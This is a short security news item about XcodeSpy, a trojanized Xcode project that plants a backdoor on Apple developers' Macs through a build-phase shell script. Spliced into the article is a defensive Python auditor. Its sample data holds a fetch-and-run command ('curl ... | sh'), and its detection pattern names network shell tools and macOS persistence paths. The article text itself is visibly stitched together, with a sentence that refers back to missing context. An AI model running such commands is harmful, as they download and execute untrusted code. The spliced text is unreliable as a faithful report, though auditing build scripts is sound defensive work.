
Hackers Infecting Apple App Developers With Trojanized Xcode Projects
2021-03-20 08:44

Cybersecurity researchers on Thursday disclosed a new attack wherein threat actors are leveraging Xcode as an attack vector to compromise Apple platform developers with a backdoor, adding to a growing trend that involves targeting developers and researchers with malicious attacks.

Dubbed "XcodeSpy," the trojanized Xcode project is a tainted version of a legitimate, open-source project available on GitHub called TabBarInteraction that's used by developers to animate iOS tab bars based on user interaction.

"XcodeSpy is a malicious Xcode project that installs a custom variant of the EggShell backdoor on the developer's macOS computer along with a persistence mechanism," SentinelOne researchers said.

The doctored Xcode project does something similar, only this time the attacks have singled out Apple developers.

"XcodeSpy takes advantage of a built-in feature of Apple's IDE which allows developers to run a custom shell script on launching an instance of their target application," the researchers said.
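One way to review a third-party Xcode project for the kind of embedded script described above before building it (an added example, not code from the article or from the researchers). It assumes the script lives in a Run Script build phase, which Xcode stores in `project.pbxproj` as a `PBXShellScriptBuildPhase` object with a `shellScript` string; the sample input and the hint patterns are constructed for illustration.

```python
import re
import sys

# Constructed project.pbxproj fragment for the demo (not taken from XcodeSpy).
SAMPLE_PBXPROJ = r'''
/* Begin PBXShellScriptBuildPhase section */
		A1B2C3D4 /* Run Script */ = {
			isa = PBXShellScriptBuildPhase;
			shellPath = /bin/sh;
			shellScript = "echo \"lint\"\nswiftlint || true\n";
		};
		E5F6A7B8 /* Run Script */ = {
			isa = PBXShellScriptBuildPhase;
			shellPath = /bin/sh;
			shellScript = "curl -s https://example.invalid/x | sh\n";
		};
/* End PBXShellScriptBuildPhase section */
'''

# Xcode stores each Run Script body as one escaped, quoted string.
SCRIPT_RE = re.compile(r'shellScript = "((?:[^"\\]|\\.)*)";')
_ESCAPES = {"n": "\n", "t": "\t"}

# Generic review hints (an assumption of this example, not a signature list):
# network fetches, decoding, piping into a shell, macOS persistence paths.
HINT_RE = re.compile(
    r'\b(?:curl|wget|nc|base64|osascript|launchctl)\b'
    r'|/dev/tcp/|LaunchAgents|LaunchDaemons|\|\s*(?:ba|z)?sh\b')

def unescape(raw):
    """Undo pbxproj string escaping (escaped newlines, tabs, quotes, backslashes)."""
    return re.sub(r'\\(.)', lambda m: _ESCAPES.get(m.group(1), m.group(1)), raw)

def audit_pbxproj(text):
    """Return (script, hints) for every shell script embedded in the project."""
    findings = []
    for match in SCRIPT_RE.finditer(text):
        script = unescape(match.group(1))
        hints = sorted({h.group(0) for h in HINT_RE.finditer(script)})
        findings.append((script, hints))
    return findings

if __name__ == "__main__":
    # Usage: python audit_pbxproj.py path/to/App.xcodeproj/project.pbxproj
    text = open(sys.argv[1], encoding="utf-8").read() if len(sys.argv) > 1 else SAMPLE_PBXPROJ
    for number, (script, hints) in enumerate(audit_pbxproj(text), 1):
        print(f"--- embedded script #{number}; review hints: {hints or 'none'}")
        print(script)
```

An empty hint list does not clear a script; every embedded script in a project from an untrusted source should be read in full before the first build.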

Adversaries have previously resorted to tainted Xcode executables to inject malicious code into iOS apps compiled with the infected Xcode without the developers' knowledge, and subsequently use the infected apps to collect information from the devices once they are downloaded and installed from the App Store.


News URL

http://feedproxy.google.com/~r/TheHackersNews/~3/3hFlRb3HEek/hackers-infecting-apple-app-developers.html
